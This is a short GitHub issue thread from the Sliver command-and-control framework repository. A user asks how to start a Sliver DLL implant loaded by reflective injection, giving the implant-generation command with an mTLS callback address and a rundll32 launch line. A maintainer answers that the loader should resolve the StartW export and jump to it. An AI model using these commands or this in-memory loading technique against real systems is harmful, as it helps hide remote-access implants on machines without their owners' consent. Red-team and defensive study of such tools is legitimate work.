### ISSUE TITLE
How to StartW a implant reflectively injected

### ISSUE THREAD

**Issue by sf0x** [BishopFox/sliver#1522]
Hello,
I'm currently diving into reflective DLL injection and play around with [this ired code](https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection). It works well with all kind of DLLs, but not so with sliver.  
After 4 hours of hanging in the debugger and understanding every type in the code, I came to the conclusion that everything is working, but StartW is not executed when DLL_PROCESS_ATTACH is called. I tried to use the `--run-on-load` option, since it sounded exactly what I needed, but it changed nothing.  
The implant i use was created with `generate --mtls 192.168.20.2:8888 --arch amd64 --format shared -e --os windows`.  
`rundll32.exe IMPLANT.dll,StartW` is working as expected. msf DLLs are working with the code too.    
  
How do I call StartW() from the code, if the DLL is already loaded in memory and attached? Do I have to implement a loop that is searching for StartW in the DLL in memory, saves the address and calls it via a function pointer? 

There is very few documentation about the "shared" implants. It took me around two hours to understand that there is no DllMain called, when attached.

Thank you in advance.

**Comment by rkervella** [comment]
> How do I call StartW() from the code, if the DLL is already loaded in memory and attached? Do I have to implement a loop that is searching for StartW in the DLL in memory, saves the address and calls it via a function pointer?

Basically yes: parse the exports, retrieve the address of `StartW` and jump to it.

**Comment by sf0x** [comment]
Thank you for the quick response. I will try.
Cheers
